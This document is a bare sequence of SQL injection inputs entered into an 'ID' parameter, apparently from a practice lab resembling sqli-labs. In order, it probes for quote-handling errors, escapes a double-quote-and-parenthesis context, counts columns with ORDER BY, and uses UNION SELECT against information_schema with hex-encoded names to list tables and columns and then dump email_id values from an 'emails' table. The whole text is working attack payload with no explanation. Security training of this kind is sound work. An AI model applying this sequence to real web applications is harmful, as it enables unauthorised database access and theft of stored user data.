ID:1
ID:1\
ID:1
ID:'
ID:1 and 1=1
ID:1 and 1=2
ID:1 and 1=3
ID:9999
ID:9999'
ID:1
ID:2
ID:3
ID:1
ID:1"
ID:1")
ID:1")order by 3- 
ID:1")order by 3-- 
ID:1")union select 1,2,3-- 
ID:1")union select 1,database(),3-- 
ID:99999")union select 1,database(),3-- 
ID:99999")union select 1,table_name,3 from information_schema.tables where table_schema=0x7365637572697479-- 
ID:99999")union select 1,column_name,3 from information_schema.columns where table_name=0x656D61696C73-- 
ID:99999")union select 1,column_name,3 from information_schema.columns where table_name=0x656D61696C73 limit 1,1-- 
ID:99999")union select 1,email_id,3 from emails
ID:99999")union select 1,email_id,3 from emails-- 
